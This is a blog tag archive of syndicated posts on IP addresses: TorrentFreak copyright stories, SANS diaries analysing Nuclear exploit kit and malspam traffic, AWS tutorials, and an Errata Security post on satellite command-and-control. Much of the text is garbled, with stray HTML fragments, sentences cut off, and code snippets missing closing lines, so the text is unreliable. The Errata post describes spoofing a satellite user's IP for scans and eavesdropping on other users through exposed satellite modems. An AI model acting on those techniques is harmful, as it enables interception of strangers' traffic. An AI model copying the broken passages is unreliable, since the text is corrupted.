Posts tagged ‘ip address’

TorrentFreak: Anti-Piracy Activities Get VPNs Banned at Torrent Sites

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

spyFor the privacy-conscious Internet user, VPNs and similar services are now considered must-have tools. In addition to providing much needed security, VPNs also allow users to side-step geo-blocking technology, a useful ability for today’s global web-trotter.

While VPNs are often associated with file-sharing activity, it may be of interest to learn that they are also used by groups looking to crack down on the practice. Just like file-sharers it appears that anti-piracy groups prefer to work undetected, as events during the past few days have shown.

Earlier this week while doing our usual sweep of the world’s leading torrent sites, it became evident that at least two popular portals were refusing to load. Finding no complaints that the sites were down, we were able to access them via publicly accessible proxies and as a result thought no more of it.

A day later, however, comments began to surface on Twitter that some VPN users were having problems accessing certain torrent sites. Sure enough, after we disabled our VPN the affected sites sprang into action. Shortly after, reader emails to TF revealed that other users were experiencing similar problems.

Eager to learn more, TF opened up a dialog with one of the affected sites and in return for granting complete anonymity, its operator agreed to tell us what had been happening.

“The IP range you mentioned was used for massive DMCA crawling and thus it’s been blocked,” the admin told us.

Intrigued, we asked the operator more questions. How do DMCA crawlers manifest themselves? Are they easy to spot and deal with?

“If you see 15,000 requests from the same IP address after integrity checks on the IP’s browsers for the day, you can safely assume its a [DMCA] bot,” the admin said.

From the above we now know that anti-piracy bots use commercial VPN services, but do they also access the sites by other means?

“They mostly use rented dedicated servers. But sometimes I’ve even caught them using Hola VPN,” our source adds. Interestingly, it appears that the anti-piracy activities were directed through the IP addresses of Hola users without them knowing.

Once spotted the IP addresses used by the aggressive bots are banned. The site admin wouldn’t tell TF how his system works. However, he did disclose that sizable computing resources are deployed to deal with the issue and that the intelligence gathered proves extremely useful.

Of course, just because an IP address is banned at a torrent site it doesn’t necessarily follow that a similar anti-DMCA system is being deployed. IP addresses are often excluded after being linked to users uploading spam, fakes and malware. Additionally, users can share IP addresses, particularly in the case of VPNs. Nevertheless, the banning of DMCA notice-senders is a documented phenomenon.

Earlier this month Jonathan Bailey at Plagiarism Today revealed his frustrations when attempting to get so-called “revenge porn” removed from various sites.

“Once you file your copyright or other notice of abuse, the host, rather than remove the material at question, simply blocks you, the submitter, from accessing the site,” Bailey explains.

“This is most commonly done by blocking your IP address. This means, when you come back to check and see if the site’s content is down, it appears that the content, and maybe the entire site, is offline. However, in reality, the rest of the world can view the content, it’s just you that can’t see it,” he notes.

Perhaps unsurprisingly, Bailey advises a simple way of regaining access to a site using these methods.

“I keep subscriptions with multiple VPN providers that give access to over a hundred potential IP addresses that I can use to get around such tactics,” he reveals.

The good news for both file-sharers and anti-piracy groups alike is that IP address blocks like these don’t last forever. The site we spoke with said that blocks on the VPN range we inquired about had already been removed. Still, the cat and mouse game is likely to continue.

Source: TorrentFreak, for the latest info on copyright, file-sharing, torrent sites and ANONYMOUS VPN services.

SANS Internet Storm Center, InfoCON: green: BizCN gate actor update, (Fri, Oct 2nd)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green


The actor using gates registered through BizCN(alwayswith privacy protection) continues using the Nuclear exploit kit (EK) to deliver malware.

My previous diary on this actor documented the actors switch from Fiesta EK to Nuclear EK in early July 2015 [1]. Since then, the BizCN gate actor briefly switched to Neutrino EK in however, it appears to be using Nuclear EK again.

Our thanksto Paul, who submitted a pcap of”>”>”>actorto the ISC.


Pauls pcap showed us a Google search leading to thecompromised website.In the image below, youcan alsosee” />
Shown above: A pcap of the traffic filtered by HTTP request.

No payload was found inthis EK traffic, so the Windowshost viewing the compromised websitedidnt get infected. The Windows host from this pcapwas running IE 11, and URLs for the EK traffic stop after the last two HTTP POST requests. These URL patterns are what Ive seen every time IE 11 crashes after getting hit with Nuclear EK.

A key thing to remember with the BizCN gate actor is the referer line from the landing page. This will always show the compromised website, and it wont indicate the BizCN-registered gate that gets you there. Pauls pcap didnt include traffic to the BizCN-registered gate, but I found a reference to it in the traffic. ” />
Shown above: Flow chart for EK traffic associated with the BizCN gate actor.

How did Ifind the gate in this example? First, I checked the referer on the HTTP GET request to the EK” />
Shown above: TCP stream for the HTTP GET request to the Nuclear EK landing page.

That referer should have injected script pointing to the BizCN gate URL, soI exported that” />
Shown above: ” />
Shown above: The object Iexportedfrom the pcap.

I searched the HTML text” />
Shown above: Malicious script in page from the compromised websitepointing to URL on the BizCN-registered gate domain.

The BizCN-registered”>, andpingingto itshowed as the IP address. ” />
Shown above: Whoisinformation on”>

This completes my flow chart for the BizCN gate actor.The domains associated from Pauls pcapwere:

  • – Compromised website
  • – – BizCN-registered gate
  • – – Nuclear EK

Final words

Recently, Ive hadhard time getting a full chain of infection traffic from theBizCN gate actor. Pauls pcap also had this issue, because there was no payload. However the BizCN gate actor is still active, and many of the compromised websites Ive noted in previous diaries [1, 4] are still compromised.

We continue to track the BizCN gate actor, and well let you know if we discover any significant changes.

Brad Duncan
Security Researcher at Rackspace
Blog: – Twitter: @malware_traffic



(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

TorrentFreak: Comcast User Hit With 112 DMCA Notices in 48 Hours

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

Every day, DMCA-style notices are sent to regular Internet users who use BitTorrent to share copyrighted material. These notices are delivered to users’ Internet service providers who pass them on in the hope that customers correct their behavior.

The most well-known notice system in operation in the United States is the so-called “six strikes” scheme, in which the leading recording labels and movie studios send educational warning notices to presumed pirates. Not surprisingly, six-strikes refers to users receiving a maximum of six notices. However, content providers outside the scheme are not bound by its rules – sometimes to the extreme.

According to a lawsuit filed this week in the United States District Court for the Western District of Pennsylvania (pdf), one unlucky Comcast user was subjected not only to a barrage of copyright notices on an unprecedented scale, but during one of the narrowest time frames yet.

The complaint comes from Rotten Records who state that the account holder behind a single Comcast IP address used BitTorrent to share the discography of Dog Fashion Disco, a long-since defunct metal band previously known as Hug the Retard.

“Defendant distributed all of the pieces of the Infringing Files allowing others to assemble them into a playable audio file,” Rotten Records’ attorney Flynn Wirkus Young explain.

Considering Rotten Records have been working with Rightscorp on other cases this year, it will come as no surprise that the anti-piracy outfit is also involved in this one. And boy have they been busy tracking this particular user. In a single 48 hour period, Rightscorp hammered the Comcast subscriber with more than two DMCA notices every hour over a single torrent.

“Rightscorp sent Defendant 112 notices via Defendant’s ISP Comcast from June 15, 2015 to June 17, 2015 demanding that Defendant stop illegally distributing Plaintiff’s work,” the lawsuit reads.

“Defendant ignored each and every notice and continued to illegally distribute Plaintiff’s work.”


While it’s clear that the John Doe behind IP address shouldn’t have been sharing the works in question (if he indeed was the culprit and not someone else), the suggestion to the Court that he or she systematically ignored 112 demands to stop infringing copyright is stretching the bounds of reasonable to say the least.

trolloridiotIn fact, Court documents state that after infringement began sometime on June 15, the latest infringement took place on June 16 at 11:49am, meaning that the defendant may well have acted on Rightscorp’s notices within 24 hours – and that’s presuming that Comcast passed them on right away, or even at all.

Either way, the attempt here is to portray the defendant as someone who had zero respect for Rotten Record’s rights, even after being warned by Rightscorp more than a hundred and ten times. Trouble is, all of those notices covered an alleged infringing period of less than 36 hours – hardly a reasonable time in which to react.

Still, it’s unlikely the Court will be particularly interested and will probably issue an order for Comcast to hand over their subscriber’s identity so he or she can be targeted by Rotten Records for a cash settlement.

Rotten has targeted Comcast users on several earlier occasions, despite being able to sue the subscribers of any service provider. Notably, while Comcast does indeed pass on Rightscorp’s DMCA takedown notices, it strips the cash settlement demand from the bottom.

One has to wonder whether Rightscorp and its client are trying to send the ISP a message with these lawsuits.

Source: TorrentFreak, for the latest info on copyright, file-sharing, torrent sites and ANONYMOUS VPN services.

SANS Internet Storm Center, InfoCON: green: Recent trends in Nuclear Exploit Kit activity, (Thu, Oct 1st)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green


Since mid-September 2015, Ive generated a great deal of Nuclear exploit kit (EK) traffic after checking compromised websites. This summer, I usually foundAngler EK. Now Im seeing more Nuclear.

Nuclear EK has alsobeen sending dual payloads. Idocumented dual payloads at least three times last year [1, 2, 3], but I hadnt noticed it again from Nuclear EKuntil recently. This time,one of the payloadsappears to beransomware. I sawFilecoder on 2015-09-18[4] and TeslaCrypt 2.0 on 2015-09-29[5]. In both cases,ransomware was a componentof the dual payloads from Nuclear EK.

To be clear, Nuclear EK isnt always sendingtwo payloads,but Ive noticed a dual payload trendwith this recent increase in Nuclear EK traffic.

Furthermore, on Wednesday 2015-09-30, the URL patternfor Nuclear EKs landing page changed. With that in mind, lets take a look at whats happening with Nuclear.

URL patterns

The images below show some examples of URL patterns for Nuclear EK”>Shown above: Some URLsfrom Nuclear EK on 2015-09-15. Pcap” />
Shown above: Some URLs from Nuclear EK on 2015-09-16. “>Shown above: Some URLsfrom Nuclear EK on 2015-09-18. Pcap”>Shown above: Some URLs from Nuclear EK on 2015-09-22. Pcap”>Shown above: Some URLs from Nuclear EK on 2015-09-29.Pcapavailable here.

In the above images, the initial HTTP GET request always starts with /search?q= for the landing page URL. “>Shown above: Some URLs fromNuclear EK on 2015-09-30.

The initial HTTP GET request now starts with /url?sa= instead of”>for the landing page URL. I saw the same thing from three different examples of Nuclear EK on 2015-09-30. Windows hosts from these examplesall had the exact”>Nuclear EK examples from 2015-09-30

I had some trouble infectinga Windows 7 host running IE 11. “>The browser always crashed before the EK”>payload was sent. SoI tried three different configurations to generate traffic for this diary. The first run hadaWindows 7 host running IE 10. The second run had a Windows 7 host runniningIE 8. The third run had a Windows 7 host running IE 11. All hosts were running”>I found a compromised website withan injected iframe leading to Nuclear EK. The screenshot below shows an example of themalicious script at the bottom of the page. Itsright before the closing body and HTML tags. Youll” />
Shown above: “>The first run used IE 10 with Flash player ” />
Shown above: Desktop background from the infected host.

Decrypt instructions were left as a text file on the desktop. The authors behind this ransomwareused and as email addresses for further decryption” />
Shown above: Decryption instructions from the ransomware.

Playing around with the pcap in Wireshark, I got a decent representation of the traffic. Below, youll see the compromised website, Nuclear EK on, and some of the post infection traffic. TLS activityon ports 443 and 9001 with random characters for the server names is Tor traffic. Several other attempted TCP connections can be found in the pcap, but none of those were successful, and theyre not shown below. ” />
Shown above: Some of the infection traffic from the pcap in Wireshark (from a Windows host usingIE 10 and Flash player

Below are alerts on the infection traffic when Iused tcpreplay onSecurity Onion with the EmergingThreats(ET)and ET Pro”>Shownabove: Alerts from the traffic using Sguil in Security Onion.

For the second run, Iinfecteda different Windows host running IE 8 and Flash player This generatedNuclear EK from from the same IP address and a slightly different domain name. however, I didt see the same traffic that triggered” />
Shown above: Nuclear EK traffic using IE 8 and Flash player

For the third run, I used a Windows host with IE 11 and Flash player As mentioned earlier, the browser would crash before the EK sent the payload, so this host didnt get infected with malware. I tried it once with Flash player and once without Flash player, both times running an unpatched version of IE 11. Each time, the browser crashed. Nuclear EK was still using the same IP address, butdifferent domain names were different. Within a 4 minute timespan on the pcap,youll find” />
Shown above: Nuclear EK traffic using”>1 and Flash”>… Tried twice but”>below”>Shown” />
Shown” />
Shown above: Nuclear EK sends the secondmalware payload.

Other than the landing page URL patternand dual payload,Nuclear EK looks remarkably similar to the last time we reviewed itin August 2015 [6].

Preliminary malware analysis

The first and second runs generated a full infection chain and post-infection traffic. The malware payload was the same during the first and second run. The first run had additional malware on the infected host. The third run using IE 11 didnt generate any malware payload.

Nuclear EK malware payload 1 of 2:

AWS Official Blog: New – Receive and Process Incoming Email with Amazon SES

This post was syndicated from: AWS Official Blog and was written by: Jeff Barr. Original post: at AWS Official Blog

We launched the Amazon Simple Email Service (SES) way back in 2011, with a focus on deliverability — getting mail through to the intended recipients. Today, the service is used by Amazon and our customers to send billions of transactional and marketing emails each year.

Today we are launching a much-requested new feature for SES. You can now use SES to receive email messages for entire domains or for individual addresses within a domain. This will allow you to build scalable, highly automated systems that can programmatically send, receive, and process messages with minimal human intervention.

You use sophisticated rule sets and IP address filters to control the destiny of each message. Messages that match a rule can be augmented with additional headers, stored in an S3 bucket, routed to an SNS topic, passed to a Lambda function, or bounced.

Receiving and Processing Email
In order to make use of this feature you will need to verify that you own the domain of interest. If you have already done this in order to use SES to send email, then you are already good to go.

Now you need to route your incoming email to SES for processing. You have two options here. You can set the domain’s MX (Mail Exchange) record to point to the SES SMTP endpoint in the region where you want to process incoming email. Or, you can configure your existing mail handling system to forward mail to the endpoint.

The next step is to figure out what you want to do with the messages. To do this, you need to create some receipt rules. Rules are grouped into rule sets (order matters within the set) and can apply to multiple domains. Like most aspects of AWS, rules and rule sets are specific to a particular region. You can have one active rule set per AWS region; if you have no such set, then all incoming email will be rejected.

Rules have the following attributes:

  • Enabled – A flag that enables or disables the rule.
  • Recipients – A list of email addresses and/or domains that the rule applies to. If this attribute is not supplied, the rule matches all addresses in the domain.
  • Scan – A flag to request spam and virus scans (default is true).
  • TLS – A flag to require that mail matching this rule is delivered over a connection that is encrypted with TLS.
  • Action List -An ordered list of actions to perform on messages that match the rule.

When SES receives a message, it performs several checks before it accepts the message for further processing. Here’s what happens:

  • The source IP address is checked against an internal list maintained by SES, and rejected if so (this list can be overridden using an IP address filter that explicitly allows the IP address).
  • The source IP address is checked against your IP address filters, and rejected if so directed by the filter.
  • The message is checked to see if it matches any of the recipients specified in a rule, or if there’s a domain level match, and accepted if so.

Messages that do not match a rule do not cost you anything. After a message has been accepted, SES will perform the actions associated with the matching rule.  The following actions are available:

  • Add a header to the message.
  • Store the message in a designated S3 bucket, with optional encryption using a key stored in AWS Key Management Service (KMS). The entire message (headers and body) must be no larger than 30 megabytes in size for this action to be effective.
  • Publish the message to a designated SNS topic. The entire message (headers and body) must be no larger than 150 kilobytes in size for this action to be effective.
  • Invoke a Lambda function. The invocation can be synchronous or asynchronous (the default).
  • Return a specified bounce message to the sender.
  • Stop processing the actions in the rule.

The actions are run in the order specified by the rule. Lambda actions have access to the results of the spam and virus scans and can take action accordingly. If the Lambda function needs access to the body of the message, a preceding action in the rule must store the message in S3.

A Quick Demo
Here’s how I would create a rule that passes incoming email messages to a Lambda function (MyFunction) notifies an SNS topic (MyTopic), and then stores the messages in an S3 bucket (MyBucket) after encrypting them with a KMS key (aws/ses):

I can see all of my rules at a glance:

Here’s a Lambda function that will stop further processing if a message fails any of the spam or virus checks. In order for this function to perform as expected, it must be invoked in synchronous (RequestResponse) fashion.

exports.handler = function(event, context) {
    console.log('Spam filter');
    var sesNotification = event.Records[0].ses;
    console.log("SES Notification:n", JSON.stringify(sesNotification, null, 2));
    // Check if any spam check failed
    if (sesNotification.receipt.spfVerdict.status      === 'FAIL'
        || sesNotification.receipt.dkimVerdict.status  === 'FAIL'
        || sesNotification.receipt.spamVerdict.status  === 'FAIL'
        || sesNotification.receipt.virusVerdict.status === 'FAIL')
        console.log('Dropping spam');
        // Stop processing rule set, dropping message

To learn more about this feature, read Receiving Email in the Amazon SES Developer Guide.

Pricing and Availability
You will pay $0.10 for every 1000 emails that you receive. Messages that are 256 KB or larger are charged for the number of complete 256 KB chunks in the message, at the rate of $0.09 per 1000 chunks. A 768 KB message counts for 3 chunks. You’ll also pay for any S3, SNS, or Lambda resources that you consume. Refer to the Amazon SES Pricing page for more information.

This new feature is available now and you can start using it today. Amazon SES is available in the US East (Northern Virginia), US West (Oregon), and Europe (Ireland) regions.

— Jeff;

AWS Security Blog: Use AWS Services to Comply with Security Best Practices—Minus the Inordinate Time Investment

This post was syndicated from: AWS Security Blog and was written by: Jonathan Desrocher. Original post: at AWS Security Blog

As security professionals, it is our job to be sure that our decisions comply with best practices. Best practices, though, tend to be time consuming, which means we either don’t get around to following best practices, or we spend too much time on tedious, manual tasks. This blog post includes two examples where AWS services can help achieve compliance with security best practices, minus the inordinate time investment.

One AWS Identity and Access Management (IAM) best practice is to delete or regularly rotate access keys. However, knowing which AWS access keys are in use has usually involved poring over AWS CloudTrail logs. In my May 30 webinar, I highlighted the then recently launched access key last used feature that makes access key rotation easier. By knowing the date and IP address of the last usage, you can much more easily identify which keys are in use and where. You can also identify those keys that haven’t been used in a long time; this helps to maintain good security posture by retiring and deleting old, unused access keys.

If you have a Windows environment on AWS and need to join each Amazon EC2 instance to the Windows domain, the best practice is to either do it manually, or embed credentials in the Amazon Machine Image (AMI). In this Auto Scaling Lifecycle Policies for Security Practitioners video,I show you how you can use Auto Scaling lifecycle policies to, among other things, join a server to a Windows domain without sharing credentials across instances.

These are just two examples of how using AWS services helps you comply with best practices, reduce risk, and spend less time on manual tasks. If you have questions or comments, either post them below or go to the IAM forum.

– Jonathan

Application Management Blog: Using AWS OpsWorks to Customize and Automate App Deployment on Windows

This post was syndicated from: Application Management Blog and was written by: Daniel Huesch. Original post: at Application Management Blog

Using OpsWorks and Chef on Windows helps you optimize your use of Windows by reliably automating configuration tasks to enforce instance compliance. Automating instance configuration enables software engineering best practices, like code-reviews and continuous integration, and allows smaller, faster delivery than with manual configuration. With automated instance configuration, you depend less on golden images or manual changes. OpsWorks also ships with features that ease operational tasks, like user management or scaling your infrastructure by booting additional machines.

In this post, I show how you can use OpsWorks to customize your instances and deploy your apps on Windows. To show how easy application management is when using OpsWorks, we will deploy a Node.JS app to Microsoft Internet Information Server (IIS). You can find both the cookbooks and the app source code in the Amazon Web Services – Labs repository on GitHub.

To follow this example, you need to understand how OpsWorks uses recipes and lifecycle events. For more information, see What is AWS OpsWorks?.

Create the Stack and Instance

First, let’s create a stack in the OpsWorks console. Navigate to the Add Stack page at

For the name, type Node.JS Windows Demo. For the Default operating system, choose Microsoft Windows Server 2012 R2 Base.

Next, configure the cookbook source. Choose Advanced to display the Configuration Management section. Enable Use custom Chef cookbooks, choose the Git version control system as the Repository type, and enter as the Repository URL. The cookbooks that we just configured describe how a Node.JS app is installed.

Choose Add Stack to create the stack.

In the Layers section, choose Add a Layer. Choose any name and short name you like. For Security Groups, choose AWS-OpsWorks-Web-Server as an additional security group. This ensures that HTTP traffic is allowed and you can connect to the demo app with your browser. For this example, you don’t need RDP access, so you can safely ignore the warning. Choose Add Layer.

Before we add instances to this layer, we have to wire up the Chef code with the lifecycle events. To do that, edit the layer recipes. On the Layers page, under more layers, choose Recipes. On the Layer more layers page, choose Edit. For the Setup lifecycle event, choose webserver_nodejs::setup, and for the Deploy event, choose webserver_nodejs::deploy.

Confirm your changes by choosing Save.

Now we are ready to add an instance. Switch to the Instances page by choosing Instances, and then choose Add an Instance. OpsWorks suggests a Hostname based on the layer name; for this example, webserver-node1. Choose Add Instance to confirm.

Don’t start the instance yet. We need to tell OpsWorks about the app that we want to deploy first. This ensures that the app is deployed when the instance starts. (When an instance executes the Setup event during boot, OpsWorks deploys apps automatically. Later, you can deploy new and existing apps to any running instances.)

Create the App

In the left pane, choose Apps to switch to the Apps page, and then choose Add an app. Give the app a name, choose Git as the Repository type, and enter as the Repository URL. The demo app supports environment variables, so you can use the APP_ADMIN_EMAIL key to set the mail address displayed on the demo app’s front page. Use any value you like.

To save the app, choose Add App. Return to the Instances page. Now start the instance.

OpsWorks reports setup progress, switching from “requested” to “pending,” and then to “booting.” When the instance is “booting,” it is running on Amazon EC2. After the OpsWorks agent is installed and has picked up its first lifecycle event, the status changes to “running_setup.” After OpsWorks processes the Setup lifecycle event, it shows the instance as “online.” When an instance reaches the online state, OpsWorks fires a Configure lifecycle event to inform all instances in the stack about the new instance.

Booting a new instance can take a few minutes, the total time depending on the instance size and your Chef recipes. While you wait, get a cup of coffee or tea. Then, let’s take a look at the code that Chef will execute and the general structure of the opsworks-windows-example-cookbooks.

Cookbook Deep Dive – Setup Event

Let’s take a look at the webserver_nodejs::setup recipe, which we wired to the Setup event when we chose layer settings:

# Recipes to install software on initial boot

include_recipe "opsworks_iis"
include_recipe "opsworks_nodejs"
include_recipe "opsworks_iisnode"

This recipe simply includes other recipes. As you can see, Chef installs the IIS, Node.JS, and the IIS-to-Node.JS bridge iisnode. By taking a closer look at the opsworks_nodejs cookbook, we can learn how to install apps. The general folder structure of a Chef cookbook is:

├── attributes
│   └── default.rb
├── definitions
│   └── opsworks_nodejs_npm.rb
├── metadata.rb
└── recipes
    └── default.rb

The opsworks_nodejs cookbook uses attributes to define settings that you can override when using the cookbook. This makes it easy to update to a new version of Node.JS or npm, the node package manager, by just setting the attribute to another value.

The file opsworks_nodejs/attributes/default.rb defines these version attributes:

default["opsworks_nodejs"]["node_version"] = "0.12.7"
default["opsworks_nodejs"]["npm_version"] = "2.13.0"

The default recipe in the opsworks_nodejs cookbook uses the node_version and npm_version. It uses node_version as part of the download URL construction and npm_version in the batch code.

version = node["opsworks_nodejs"]["node_version"]

download_file = "node-v#{version}-x86.msi"
download_path = ::File.join(Chef::Config["file_cache_path"], download_file)

remote_file download_path do
  source "{version}/#{download_file}"
  retries 2

windows_package "nodejs" do
  source download_path

batch "install npm version #{node['opsworks_nodejs']['npm_version']}" do
  code ""%programfiles(x86)%\nodejs\npm" -g install npm@#{node['opsworks_nodejs']['npm_version']}"

The cookbook installs Node.JS in two steps. First, it uses the Chef remote_file resource to download the installation package from the official Node.JS website and save it to the local disk. The cookbook also sets the retries attribute to enable retries, so the code is more resilient to short-term networking issues.

After the cookbook saves the file, the windows_package resource installs the MSI. Then, the cookbook installs the requested npm version using the batch resource.

Chef resources provide many attributes for fine-tuning their behavior. For more information, see the Chef Resources Reference.

Cookbook Deep Dive – Deploy Event

As I mentioned, OpsWorks doesn’t prepopulate your Chef run with recipes or resources. This gives you fine-grained control and complete flexibility over how to deploy your app. However, there are some common tasks, like checking your app out of Git or downloading it from Amazon S3. To make performing common tasks easier, the example cookbooks ship with a custom Chef resource that handles these steps for you, opsworks_scm_checkout.

As it does with the Setup recipe, OpsWorks uses the webserver_nodejs::deploy recipe only to include other recipes. The opsworks_app_nodejs cookbook’s default recipe does the heavy lifting.

The slimmed-down version of the recipe looks like the following.

apps = search(:aws_opsworks_app, "deploy:true")

apps.each do |app|
  opsworks_scm_checkout app["shortname"] do

  directory app_deploy do

  # Copy app to deployment directory
  batch "copy #{app["shortname"]}" do
    code "Robocopy.exe ..."

  # Run 'npm install'
  opsworks_nodejs_npm app["shortname"] do
    cwd app_deploy

  template "#{app['shortname']}/web.config" do
    variables({ :environment => app["environment"]})

  powershell_script "register #{app["shortname"]}" do

Reviewing the code will help you understand how to write your own deployment cookbooks, so let’s walk through it. First, we use Chef search to fetch information about the apps to be deployed. The AWS OpsWorks User Guide lists all exposed attributes.

For each app, Chef then executes the following steps:

·      It checks out the app to the local file system using the opsworks_scm_checkout resource.

·      It creates the target directory and copies the app to that directory. To transfer only the files that have changed, it uses Robocopy.

·      Running npm install, it downloads all required third-party libraries. It does this by using the opsworks_nodejs_npm custom resource, which is defined in the opsworks_nodejs cookbook.

·      The web.config file is generated using a template, taking OpsWorks environment variables into account. The file configures the IIS-to-Node.JS integration.

·      A Windows PowerShell run registers the IIS site and brings the app online.

Check Out the Node.JS Demo App

Your booted instance should be online now:

To access the demo app, under Public IP, click the IP address. The app allows you to leave comments that other visitors can see.

Notice that the page is not static, but includes information about the hostname, the browser you used to request it, the system time, and the Node.JS version used. At the bottom of the page, you can see that the APP_ADMIN_EMAIL environment variable you configured in the app was picked up.

Leave a comment on the app, and choose Send. Because this is a minimal app for demo purposes only, the comment is saved on the instance in a plain JSON file.

To see the details of the customizations OpsWorks just applied to your instance, choose the hostname on the Layer overview page. On the very bottom of the Instance detail page, you will find the last 30 commands the instance received. To see the corresponding Chef log, choose show.


Using OpsWorks with Chef 12 on Windows gives you a reliable framework for customizing your Windows Server 2012 R2 instances and managing your apps. By attaching Chef recipes to lifecycle events, you can customize your instances. You can use open source community cookbooks or create your own cookbooks. Chef’s support for PowerShell allows you to reuse automation for Windows. OpsWorks’ built-in operational tools, like user management, permissions, and temporary RDP access help you manage day-to-day operations.

The example showed how to deploy a Node.JS app using IIS. By referring to typical cookbooks that were included in the example like opsworks_nodejs, which is used to install Node.JS, or opsworks_app_nodejs, which is used to deploy the app, you can learn how to write your own cookbooks.

SANS Internet Storm Center, InfoCON: green: The WordPress Plugins Playground, (Mon, Sep 14th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

This morning, I had a quick look at my web serverlog file and searched for malicious activity. Attacks like brute-force generate a lot of entries and thuscan be easily detected.Other scanners are working below the radar and search for very specific vulnerabilities. In this case, a single request is often sent to the serverand generate a simple 404 errorwithout triggering any alert. My blog beingbased on the WordPress CMS, I searched for non HTTP/200hits for plugins URLs (/wp-content/plugins/)

CMS or “>Content Management Systems became vey popular today. Its easy to deploy aWordPress, Drupal or Joomla on top of a UNIX server. They exist also shared platforms which offer you some online space. If a CMS is delivered with standard options, it is easy for the owner to customize or to tune it.. just like cars.ModernCMS offer a way to extend the features or the lookn”>From a security perspective, plugins are today the weakest point of a CMS.If most of the CMSsource code is regularly audited and well maintained. Its not the same for their plugins. By deploying and using a plugin, you install third-party code into your website and grant some rights to it. Not all plugins are developed by skilled developers or with security in mind.Today, most vulnerabilities reported in CMS environment are due to “>8000+ hits for uninstalled/non-existent plugins

  • 899 unique plugins tested”>Just for information, here is myTop-20 of tested”>If the popularity is a pluginis a good indicator, do not trust them! (Popularity !=”>WordPress has an hardening guide“>As a general advice regarding 4xx HTTP errors, do not implementchecks for single errors but search for multiple 4xx (or 5xx) errors generated in a short amount of time from a single IP address. This is helpful to detect ongoing scans! (a log management solutioncan do that very easily)
  • Xavier Mertens
    ISC Handler – Freelance Security Consultant

    (c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

    SANS Internet Storm Center, InfoCON: green: A look through the spam filters – examining waves of Upatre malspam, (Thu, Sep 10th)

    This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green


    Any email filtering worth its cost should block numerous messages every day. however, Im always interested to see what exactly is being blocked. Perhaps the most common type of malicious spam (malspam) I see from the spam filters is Upatre-based malspam.

    Ive written diaries before about specific waves of Upatre malspam sending the Dyre banking Trojan [1, 2]. Ive only noticed emails with .zip file attachments from this type of malspam. I recentlylooked through my organizations spam filters and found the same thing again. In this case, we found three different themes of malspam sent in a three-hour window, and all had Upatre malware sendingDyre. Lets take a closer look at these samples ofUpatre/Dyre malspam fromWednesday, 2015-09-09.

    A three-hour window of malspam

    Below is an image of blocked malspam with malicious attachments on Wednesday 2015-09-09 from 05:00 to approximately 08:00 CDT. ” />
    Shown above: A three-hour windows of blocked malspam from Wednesday, 2015-09-09.

    In this three-hour window, we see several different types of subject lines. Lets concentrate on the top three:

    Errata Security: Some notes on satellite C&C

    This post was syndicated from: Errata Security and was written by: Robert Graham. Original post: at Errata Security

    Wired and Ars Technica have some articles on malware using satellites for command-and-control, based on a paper by Kaspersky. The malware doesn’t hook directly to the satellites, of course. Instead, it sends packets to an IP address of a known satellite user, like a random goat herder in the middle of the wilds of Iraq. Since the satellites beam down to earth using an unencrypted signal, anybody can eavesdrop on it. Thus, while malware sends packets to that satellite downlink in Iraq, it’s actually a hacker in Germany who receives them.

    This is actually fairly old hat. If you look hard enough, somewhere (I think Google Code), you’ll find some code I wrote back around 2011 for extracting IP packets from MPEG-TS streams, for roughly this purpose.

    My idea was to use something like masscan, where I do a scan of the Internet from a fast data center, but spoof that goat herder’s IP address. Thus, everyone seeing the scan would complain about that IP address instead of mine. I would see all the responses by eavesdropping on that satellite connection.

    This doesn’t work in Europe and the United States. These markets use more expensive satellites which not only support encryption, but also narrow “spot beams” that focus on an area of a 100 mile radius.

    Instead, they work well in the Middle East and Africa. These use older, cheaper satellites to provide slow Internet. The streams from these things are usually unencrypted. The NSA loves them, I’m sure.

    The signal for these things bleeds over to Europe, and even the east coast of the United States. Thus, even though we aren’t in the intended service area, we can often get their signal. I keep meaning to setup a satellite dish at home in order to do this — there appear to be several satellites where this should be possible.

    Almost anything can be used to receive the signal.

    Several years ago, a program called “SkyGrabber” hit the news, using Windows and a USB tuner rather than the setup using Linux described in the Ars Technica article. SkyGrabber is designed for porn, both eavesdropping on porn satellite channels, but also extracting porn images and videos from TCP/IP streams on a satellite network. It made the news because, according to reports, somebody had actually gotten secret military live drone video by pointing their dish at the right satellite and choosing the right channel.

    Another way you can do this is simply with an off-the-shelf SDR (software defined radio) like HackRF. The satellite signal is easy to decode into bits (like 16PSK) and 10b/8b. The stream of bits is then encoded as an MPEG-TS (transport stream) which will carry either video or TCP/IP packets. Therefore, you need some simple software to extract the packets from the stream (hence my project mentioned above). You still need a satellite dish and an LNB, though.

    The easiest way, though, is simple use somebody else’s satellite connection. A lot of these satellite boxes are themselves on the Internet with open web interfaces. You can find these boxes using masscan or Shodan. These boxes then have diagnostic features, such as tcpdump. Many different users are multiplexed onto the same channel. Using tcpdump receives all the packets on that channel, including those intended for another user. Thus, I can find a user in Tunisia and use them to eavesdrop on that goat herder in Iraq — even though they are thousands of miles from each other, they are still on the same satellite channel.

    The economics of satellites are pretty cool. Many are just “bent-pipes”, receiving a signal from one place and beaming it at another. You just go to a satellite company, buy a channel, and setup your own equipment to send/receive anything you want over a range of about a third of the planet. There’s a heck of a lot of Christian broadcast channels do that. Theres also a lot of military uses of this — the satellite provider has no way of knowing what’s in that signal. That’s probably how that live drone feed was discovered — some user was flipping through all the Christian broadcast channels looking for a porn feed, and accidentally came across live drone footage. Somebody (not me because I’m lazy) ought to do a survey of the sky using an SDR, cataloging all the mess coming from these satellites. Theres already some good resources dedicated to listing all the TV channels, but I’m thinking more needs to be done — especially to find the obviously encrypted stuff.

    SANS Internet Storm Center, InfoCON: green: Querying the DShield API from RTIR, (Thu, Sep 3rd)

